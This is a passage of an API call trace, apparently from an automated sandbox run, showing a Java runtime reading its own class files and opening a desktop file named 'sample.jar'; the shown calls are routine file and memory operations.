Files\\Java\\jre1.8.0_171\\lib\\ext\\sunmscapi.jar", nBufferLength=0x9, lpBuffer=0x208d898, lpFilePart=0x208d890 | out: lpBuffer="", lpFilePart=0x208d890*=0x0) returned 0x39 [0103.498] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunmscapi.jar" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\ext\\sunmscapi.jar"), fInfoLevelId=0x0, lpFileInformation=0x208d630 | out: lpFileInformation=0x208d630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb3edb58, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb3edb58, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb3edb58, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x8177)) returned 1 [0103.499] free (_Block=0x122965e0) [0103.517] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunpkcs11.jar") returned 0x38 [0103.517] malloc (_Size=0x7c) returned 0x122965e0 [0103.517] wcscpy (in: _Dest=0x122965e0, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunpkcs11.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunpkcs11.jar") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunpkcs11.jar" [0103.517] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunpkcs11.jar", nBufferLength=0x9, lpBuffer=0x208d898, lpFilePart=0x208d890 | out: lpBuffer="", lpFilePart=0x208d890*=0x0) returned 0x39 [0103.517] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunpkcs11.jar" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\ext\\sunpkcs11.jar"), fInfoLevelId=0x0, lpFileInformation=0x208d630 | out: lpFileInformation=0x208d630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb3eef67, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb3eef67, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb3f033f, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x3d113)) returned 1 [0103.518] free (_Block=0x122965e0) [0103.520] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\zipfs.jar") returned 0x34 [0103.520] malloc (_Size=0x74) returned 0x122dd090 [0103.520] wcscpy (in: _Dest=0x122dd090, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\zipfs.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\zipfs.jar") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\zipfs.jar" [0103.520] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\zipfs.jar", nBufferLength=0x9, lpBuffer=0x208d898, lpFilePart=0x208d890 | out: lpBuffer="", lpFilePart=0x208d890*=0x0) returned 0x35 [0103.520] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\zipfs.jar" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\ext\\zipfs.jar"), fInfoLevelId=0x0, lpFileInformation=0x208d630 | out: lpFileInformation=0x208d630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb3f033f, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb3f033f, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb3f033f, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x10d63)) returned 1 [0103.520] free (_Block=0x122dd090) [0103.530] strlen (_Str="sun/misc/URLClassPath$JarLoader$1.class") returned 0x27 [0103.530] malloc (_Size=0x48) returned 0x1228eb40 [0103.530] malloc (_Size=0xa0) returned 0x122965e0 [0103.530] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341894b, lpNewFilePointer=0x208c980, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c980*=54626635) returned 1 [0103.530] ReadFile (in: hFile=0x134, lpBuffer=0x122965e0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c950, lpOverlapped=0x0 | out: lpBuffer=0x122965e0*, lpNumberOfBytesRead=0x208c950*=0xa0, lpOverlapped=0x0) returned 1 [0103.533] malloc (_Size=0x28) returned 0x12221ae0 [0103.533] strlen (_Str="sun/misc/URLClassPath$JarLoader$1.class") returned 0x27 [0103.534] strcpy (in: _Dest=0x208cb00, _Source="sun/misc/URLClassPath$JarLoader$1.class" | out: _Dest="sun/misc/URLClassPath$JarLoader$1.class") returned="sun/misc/URLClassPath$JarLoader$1.class" [0103.534] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3107bc2, lpNewFilePointer=0x208c580, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c580*=51411906) returned 1 [0103.534] ReadFile (in: hFile=0x134, lpBuffer=0x208c5d0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c550, lpOverlapped=0x0 | out: lpBuffer=0x208c5d0*, lpNumberOfBytesRead=0x208c550*=0x1e, lpOverlapped=0x0) returned 1 [0103.535] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3107c07, lpNewFilePointer=0x208c5e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c5e0*=51411975) returned 1 [0103.535] ReadFile (in: hFile=0x134, lpBuffer=0x122e21e0, nNumberOfBytesToRead=0xa59, lpNumberOfBytesRead=0x208c5b0, lpOverlapped=0x0 | out: lpBuffer=0x122e21e0*, lpNumberOfBytesRead=0x208c5b0*=0xa59, lpOverlapped=0x0) returned 1 [0103.536] free (_Block=0x12221ea0) [0103.536] free (_Block=0x1228e690) [0103.548] strlen (_Str="sun/misc/FileURLMapper.class") returned 0x1c [0103.548] malloc (_Size=0x48) returned 0x1228e730 [0103.548] malloc (_Size=0xa0) returned 0x122965e0 [0103.548] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3418901, lpNewFilePointer=0x208bc20, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bc20*=54626561) returned 1 [0103.548] ReadFile (in: hFile=0x134, lpBuffer=0x122965e0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208bbf0, lpOverlapped=0x0 | out: lpBuffer=0x122965e0*, lpNumberOfBytesRead=0x208bbf0*=0xa0, lpOverlapped=0x0) returned 1 [0103.549] malloc (_Size=0x1d) returned 0x12221ea0 [0103.550] strlen (_Str="sun/misc/FileURLMapper.class") returned 0x1c [0103.550] strcpy (in: _Dest=0x208bda0, _Source="sun/misc/FileURLMapper.class" | out: _Dest="sun/misc/FileURLMapper.class") returned="sun/misc/FileURLMapper.class" [0103.550] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3107759, lpNewFilePointer=0x208b820, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b820*=51410777) returned 1 [0103.550] ReadFile (in: hFile=0x134, lpBuffer=0x208b870, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b7f0, lpOverlapped=0x0 | out: lpBuffer=0x208b870*, lpNumberOfBytesRead=0x208b7f0*=0x1e, lpOverlapped=0x0) returned 1 [0103.551] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3107793, lpNewFilePointer=0x208b880, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b880*=51410835) returned 1 [0103.551] ReadFile (in: hFile=0x134, lpBuffer=0x122e21e0, nNumberOfBytesToRead=0x42f, lpNumberOfBytesRead=0x208b850, lpOverlapped=0x0 | out: lpBuffer=0x122e21e0*, lpNumberOfBytesRead=0x208b850*=0x42f, lpOverlapped=0x0) returned 1 [0103.552] free (_Block=0x12221ae0) [0103.552] free (_Block=0x1228eb40) [0103.559] wcslen (_String="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sample.jar") returned 0x28 [0103.559] malloc (_Size=0x5c) returned 0x1220f950 [0103.559] wcscpy (in: _Dest=0x1220f950, _Source="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sample.jar" | out: _Dest="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sample.jar") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sample.jar" [0103.559] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sample.jar", nBufferLength=0x9, lpBuffer=0x208cb18, lpFilePart=0x208cb10 | out: lpBuffer="", lpFilePart=0x208cb10*=0x0) returned 0x29 [0103.559] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sample.jar" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\sample.jar"), fInfoLevelId=0x0, lpFileInformation=0x208c8b0 | out: lpFileInformation=0x208c8b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe0437600, ftCreationTime.dwHighDateTime=0x1d80c89, ftLastAccessTime.dwLowDateTime=0xe0dc0c80, ftLastAccessTime.dwHighDateTime=0x1d80c89, ftLastWriteTime.dwLowDateTime=0x9ccdf400, ftLastWriteTime.dwHighDateTime=0x1d7cbd3, nFileSizeHigh=0x0, nFileSizeLow=0xb0820)) returned 1 [0103.560] free (_Block=0x1220f950) [0103.561] wcslen (_String="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sample.jar") returned 0x28 [0103.561] malloc (_Size=0x5c) returned 0x1220f640 [0103.562] wcscpy (in: _Dest=0x1220f640, _Source="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sample.jar" | out: _Dest="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sample.jar") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sample.jar" [0103.562] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sample.jar" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\sample.jar"), dwDesiredAccess=0x0, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0x2c0 [0103.562] GetFileTime (in: hFile=0x2c0, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x208ca18 | out: lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x208ca18*(dwLowDateTime=0x9ccdf400, dwHighDateTime=0x1d7cbd3)) returned 1 [0103.562] CloseHandle (hObject=0x2c0) returned 1 [0103.562] free (_Block=0x1220f640) [0103.563] malloc (_Size=0x29) returned 0x122987c0 [0103.563] _errno () returned 0x20f6be0 [0103.563] strlen (_Str="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sample.jar") returned 0x28 [0103.563] strcpy (in: _Dest=0x208c5d0, _Source="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sample.jar" | out: _Dest="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sample.jar") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sample.jar" [0103.563] strcmp (_Str1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sample.jar", _Str2="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\rt.jar") returned 1 [0103.573] wcslen (_String="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sample.jar") returned 0x28 [0103.573] malloc (_Size=0x5c) returned 0x1220f800 [0103.573] wcscpy (in: _Dest=0x1220f800, _Source="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sample.jar" | out: _Dest="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sample.jar") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sample.jar" [0103.573] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sample.jar" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\sample.jar"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0 [0103.573] free (_Block=0x1220f800) [0103.574] calloc (_Count=0x1, _Size=0xa8) returned 0x122ea1c0 [0103.574] ReadFile (in: hFile=0x2c0, lpBuffer=0x208c8b0, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x208c860, lpOverlapped=0x0 | out: lpBuffer=0x208c8b0*, lpNumberOfBytesRead=0x208c860*=0x4, lpOverlapped=0x0) returned 1 [0103.574] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x0, lpNewFilePointer=0x208c890, dwMoveMethod=0x2 | out: lpNewFilePointer=0x208c890*=722976) returned 1 [0103.574] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0xb07a0, lpNewFilePointer=0x208c660, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c660*=722848) returned 1 [0103.574] ReadFile (in: hFile=0x2c0, lpBuffer=0x208c6c0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x208c630, lpOverlapped=0x0 | out: lpBuffer=0x208c6c0*, lpNumberOfBytesRead=0x208c630*=0x80, lpOverlapped=0x0) returned 1 [0103.575] free (_Block=0x122987c0) [0103.577] strlen (_Str="sun/misc/JarIndex.class") returned 0x17 [0103.577] malloc (_Size=0x48) returned 0x1228e5a0 [0103.577] malloc (_Size=0xa0) returned 0x122ea270 [0103.577] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3418257, lpNewFilePointer=0x208ba30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ba30*=54624855) returned 1 [0103.578] ReadFile (in: hFile=0x134, lpBuffer=0x122ea270, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208ba00, lpOverlapped=0x0 | out: lpBuffer=0x122ea270*, lpNumberOfBytesRead=0x208ba00*=0xa0, lpOverlapped=0x0) returned 1 [0103.579] malloc (_Size=0x18) returned 0x12292f10 [0103.579] strlen (_Str="sun/misc/JarIndex.class") returned 0x17 [0103.579] strcpy (in: _Dest=0x208bbb0, _Source="sun/misc/JarIndex.class" | out: _Dest="sun/misc/JarIndex.class") returned="sun/misc/JarIndex.class" [0103.579] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30f85b9, lpNewFilePointer=0x208b630, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b630*=51348921) returned 1 [0103.579] ReadFile (in: hFile=0x134, lpBuffer=0x208b680, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b600, lpOverlapped=0x0 | out: lpBuffer=0x208b680*, lpNumberOfBytesRead=0x208b600*=0x1e, lpOverlapped=0x0) returned 1 [0103.581] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30f85ee, lpNewFilePointer=0x208b690, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b690*=51348974) returned 1 [0103.581] ReadFile (in: hFile=0x134, lpBuffer=0x1227e120, nNumberOfBytesToRead=0x14d3, lpNumberOfBytesRead=0x208b660, lpOverlapped=0x0 | out: lpBuffer=0x1227e120*, lpNumberOfBytesRead=0x208b660*=0x14d3, lpOverlapped=0x0) returned 1 [0103.581] free (_Block=0x12221ea0) [0103.582] free (_Block=0x1228e730) [0103.595] strlen (_Str="sun/misc/ExtensionDependency.class") returned 0x22 [0103.595] malloc (_Size=0x48) returned 0x1228e730 [0103.595] malloc (_Size=0xa0) returned 0x122ea270 [0103.595] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3418207, lpNewFilePointer=0x208d3d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d3d0*=54624775) returned 1 [0103.595] ReadFile (in: hFile=0x134, lpBuffer=0x122ea270, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d3a0, lpOverlapped=0x0 | out: lpBuffer=0x122ea270*, lpNumberOfBytesRead=0x208d3a0*=0xa0, lpOverlapped=0x0) returned 1 [0103.595] malloc (_Size=0x23) returned 0x12221ae0 [0103.595] strlen (_Str="sun/misc/ExtensionDependency.class") returned 0x22 [0103.595] strcpy (in: _Dest=0x208d550, _Source="sun/misc/ExtensionDependency.class" | out: _Dest="sun/misc/ExtensionDependency.class") returned="sun/misc/ExtensionDependency.class" [0103.595] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30f6627, lpNewFilePointer=0x208cfd0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cfd0*=51340839) returned 1 [0103.595] ReadFile (in: hFile=0x134, lpBuffer=0x208d020, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cfa0, lpOverlapped=0x0 | out: lpBuffer=0x208d020*, lpNumberOfBytesRead=0x208cfa0*=0x1e, lpOverlapped=0x0) returned 1 [0103.595] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30f6667, lpNewFilePointer=0x208d030, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d030*=51340903) returned 1 [0103.596] ReadFile (in: hFile=0x134, lpBuffer=0x1227e120, nNumberOfBytesToRead=0x1f52, lpNumberOfBytesRead=0x208d000, lpOverlapped=0x0 | out: lpBuffer=0x1227e120*, lpNumberOfBytesRead=0x208d000*=0x1f52, lpOverlapped=0x0) returned 1 [0103.597] free (_Block=0x12292f10) [0103.597] free (_Block=0x1228e5a0) [0103.618] malloc (_Size=0x48) returned 0x1228e280 [0103.618] malloc (_Size=0xa0) returned 0x122ea270 [0103.618] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0xb061e, lpNewFilePointer=0x208de50, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208de50*=722462) returned 1 [0103.618] ReadFile (in: hFile=0x2c0, lpBuffer=0x122ea270, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208de20, lpOverlapped=0x0 | out: lpBuffer=0x122ea270*, lpNumberOfBytesRead=0x208de20*=0xa0, lpOverlapped=0x0) returned 1 [0103.618] malloc (_Size=0x15) returned 0x122933f0 [0103.619] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x39, lpNewFilePointer=0x208c080, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c080*=57) returned 1 [0103.619] ReadFile (in: hFile=0x2c0, lpBuffer=0x208c0d0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c050, lpOverlapped=0x0 | out: lpBuffer=0x208c0d0*, lpNumberOfBytesRead=0x208c050*=0x1e, lpOverlapped=0x0) returned 1 [0103.619] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x6b, lpNewFilePointer=0x208c0e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c0e0*=107) returned 1 [0103.619] ReadFile (in: hFile=0x2c0, lpBuffer=0x208c1f0, nNumberOfBytesToRead=0xa3, lpNumberOfBytesRead=0x208c0b0, lpOverlapped=0x0 | out: lpBuffer=0x208c1f0*, lpNumberOfBytesRead=0x208c0b0*=0xa3, lpOverlapped=0x0) returned 1 [0103.620] malloc (_Size=0x8000) returned 0x122ec3d0 [0103.622] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x6b, lpNewFilePointer=0x208c140, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c140*=107) returned 1 [0103.622] ReadFile (in: hFile=0x2c0, lpBuffer=0x208c250, nNumberOfBytesToRead=0xa3, lpNumberOfBytesRead=0x208c110, lpOverlapped=0x0 | out: lpBuffer=0x208c250*, lpNumberOfBytesRead=0x208c110*=0xa3, lpOverlapped=0x0) returned 1 [0103.658] malloc (_Size=0x48) returned 0x1228e960 [0103.658] malloc (_Size=0xa0) returned 0x122ea270 [0103.658] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0xb0709, lpNewFilePointer=0x208e100, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e100*=722697) returned 1 [0103.658] ReadFile (in: hFile=0x2c0, lpBuffer=0x122ea270, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e0d0, lpOverlapped=0x0 | out: lpBuffer=0x122ea270*, lpNumberOfBytesRead=0x208e0d0*=0xa0, lpOverlapped=0x0) returned 1 [0103.659] malloc (_Size=0x12) returned 0x12293070 [0103.672] free (_Block=0x122933f0) [0103.673] free (_Block=0x1228e280) [0103.682] strlen (_Str="sun/misc/URLClassPath$JarLoader$2.class") returned 0x27 [0103.682] malloc (_Size=0x48) returned 0x1228e410 [0103.683] malloc (_Size=0xa0) returned 0x122ea270 [0103.683] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3417ed9, lpNewFilePointer=0x208d770, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d770*=54623961) returned 1 [0103.683] ReadFile (in: hFile=0x134, lpBuffer=0x122ea270, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d740, lpOverlapped=0x0 | out: lpBuffer=0x122ea270*, lpNumberOfBytesRead=0x208d740*=0xa0, lpOverlapped=0x0) returned 1 [0103.683] malloc (_Size=0x28) returned 0x12221ea0 [0103.683] strlen (_Str="sun/misc/URLClassPath$JarLoader$2.class") returned 0x27 [0103.684] strcpy (in: _Dest=0x208d8f0, _Source="sun/misc/URLClassPath$JarLoader$2.class" | out: _Dest="sun/misc/URLClassPath$JarLoader$2.class") returned="sun/misc/URLClassPath$JarLoader$2.class" [0103.684] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30f1561, lpNewFilePointer=0x208d370, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d370*=51320161) returned 1 [0103.684] ReadFile (in: hFile=0x134, lpBuffer=0x208d3c0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d340, lpOverlapped=0x0 | out: lpBuffer=0x208d3c0*, lpNumberOfBytesRead=0x208d340*=0x1e, lpOverlapped=0x0) returned 1 [0103.684] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30f15a6, lpNewFilePointer=0x208d3d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d3d0*=51320230) returned 1 [0103.684] ReadFile (in: hFile=0x134, lpBuffer=0x1227e120, nNumberOfBytesToRead=0x688, lpNumberOfBytesRead=0x208d3a0, lpOverlapped=0x0 | out: lpBuffer=0x1227e120*, lpNumberOfBytesRead=0x208d3a0*=0x688, lpOverlapped=0x0) returned 1 [0103.685] free (_Block=0x12221ae0) [0103.685] free (_Block=0x1228e730) [0103.690] strlen (_Str="sun/misc/Resource.class") returned 0x17 [0103.690] malloc (_Size=0x48) returned 0x1228e460 [0103.690] malloc (_Size=0xa0) returned 0x122ea270 [0103.690] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3417e94, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=54623892) returned 1 [0103.690] ReadFile (in: hFile=0x134, lpBuffer=0x122ea270, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x122ea270*, lpNumberOfBytesRead=0x208cd00*=0xa0, lpOverlapped=0x0) returned 1 [0103.690] malloc (_Size=0x18) returned 0x12293410 [0103.690] strlen (_Str="sun/misc/Resource.class") returned 0x17 [0103.690] strcpy (in: _Dest=0x208ceb0, _Source="sun/misc/Resource.class" | out: _Dest="sun/misc/Resource.class") returned="sun/misc/Resource.class" [0103.691] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30f0dae, lpNewFilePointer=0x208c930, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c930*=51318190) returned 1 [0103.691] ReadFile (in: hFile=0x134, lpBuffer=0x208c980, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c900, lpOverlapped=0x0 | out: lpBuffer=0x208c980*, lpNumberOfBytesRead=0x208c900*=0x1e, lpOverlapped=0x0) returned 1 [0103.922] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30f0de3, lpNewFilePointer=0x208c990, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c990*=51318243) returned 1 [0103.922] ReadFile (in: hFile=0x134, lpBuffer=0x1227e940, nNumberOfBytesToRead=0x77e, lpNumberOfBytesRead=0x208c960, lpOverlapped=0x0 | out: lpBuffer=0x1227e940*, lpNumberOfBytesRead=0x208c960*=0x77e, lpOverlapped=0x0) returned 1 [0103.923] free (_Block=0x12221ea0) [0103.923] free (_Block=0x1228e410) [0103.935] strlen (_Str="java/lang/Package.class") returned 0x17 [0103.936] malloc (_Size=0x48) returned 0x1228e280 [0103.936] malloc (_Size=0xa0) returned 0x122ea270 [0103.936] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3405564, lpNewFilePointer=0x208d320, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d320*=54547812) returned 1 [0103.936] ReadFile (in: hFile=0x134, lpBuffer=0x122ea270, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d2f0, lpOverlapped=0x0 | out: lpBuffer=0x122ea270*, lpNumberOfBytesRead=0x208d2f0*=0xa0, lpOverlapped=0x0) returned 1 [0103.936] malloc (_Size=0x18) returned 0x122935f0 [0103.936] strlen (_Str="java/lang/Package.class") returned 0x17 [0103.936] strcpy (in: _Dest=0x208d4a0, _Source="java/lang/Package.class" | out: _Dest="java/lang/Package.class") returned="java/lang/Package.class" [0103.936] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2df9557, lpNewFilePointer=0x208cf20, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cf20*=48207191) returned 1 [0103.936] ReadFile (in: hFile=0x134, lpBuffer=0x208cf70, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cef0, lpOverlapped=0x0 | out: lpBuffer=0x208cf70*, lpNumberOfBytesRead=0x208cef0*=0x1e, lpOverlapped=0x0) returned 1 [0104.038] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2df958c, lpNewFilePointer=0x208cf80, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cf80*=48207244) returned 1 [0104.038] ReadFile (in: hFile=0x134, lpBuffer=0x1227e120, nNumberOfBytesToRead=0x21be, lpNumberOfBytesRead=0x208cf50, lpOverlapped=0x0 | out: lpBuffer=0x1227e120*, lpNumberOfBytesRead=0x208cf50*=0x21be, lpOverlapped=0x0) returned 1 [0104.122] free (_Block=0x12293410) [0104.123] free (_Block=0x1228e460) [0104.131] malloc (_Size=0x48) returned 0x1228e640 [0104.132] malloc (_Size=0xa0) returned 0x122ea270 [0104.132] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3405509, lpNewFilePointer=0x208d310, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d310*=54547721) returned 1 [0104.132] ReadFile (in: hFile=0x134, lpBuffer=0x122ea270, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d2e0, lpOverlapped=0x0 | out: lpBuffer=0x122ea270*, lpNumberOfBytesRead=0x208d2e0*=0xa0, lpOverlapped=0x0) returned 1 [0104.132] malloc (_Size=0x2e) returned 0x12298c80 [0104.132] strlen (_Str="sun/security/util/SignatureFileVerifier.class") returned 0x2d [0104.132] strcpy (in: _Dest=0x208d490, _Source="sun/security/util/SignatureFileVerifier.class" | out: _Dest="sun/security/util/SignatureFileVerifier.class") returned="sun/security/util/SignatureFileVerifier.class" [0104.132] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2df5fa3, lpNewFilePointer=0x208cf10, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cf10*=48193443) returned 1 [0104.132] ReadFile (in: hFile=0x134, lpBuffer=0x208cf60, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cee0, lpOverlapped=0x0 | out: lpBuffer=0x208cf60*, lpNumberOfBytesRead=0x208cee0*=0x1e, lpOverlapped=0x0) returned 1 [0104.133] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2df5fee, lpNewFilePointer=0x208cf70, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cf70*=48193518) returned 1 [0104.133] ReadFile (in: hFile=0x134, lpBuffer=0x1227e120, nNumberOfBytesToRead=0x3569, lpNumberOfBytesRead=0x208cf40, lpOverlapped=0x0 | out: lpBuffer=0x1227e120*, lpNumberOfBytesRead=0x208cf40*=0x3569, lpOverlapped=0x0) returned 1 [0104.135] free (_Block=0x122935f0) [0104.136] free (_Block=0x1228e280) [0104.145] strlen (_Str="sun/security/util/DisabledAlgorithmConstraints.class") returned 0x34 [0104.145] malloc (_Size=0x48) returned 0x1228ee10 [0104.145] malloc (_Size=0xa0) returned 0x122ea270 [0104.145] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33e3013, lpNewFilePointer=0x208cc90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cc90*=54407187) returned 1 [0104.145] ReadFile (in: hFile=0x134, lpBuffer=0x122ea270, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208cc60, lpOverlapped=0x0 | out: lpBuffer=0x122ea270*, lpNumberOfBytesRead=0x208cc60*=0xa0, lpOverlapped=0x0) returned 1 [0104.146] malloc (_Size=0x35) returned 0x12298b40 [0104.146] strlen (_Str="sun/security/util/DisabledAlgorithmConstraints.class") returned 0x34 [0104.146] strcpy (in: _Dest=0x208ce10, _Source="sun/security/util/DisabledAlgorithmConstraints.class" | out: _Dest="sun/security/util/DisabledAlgorithmConstraints.class") 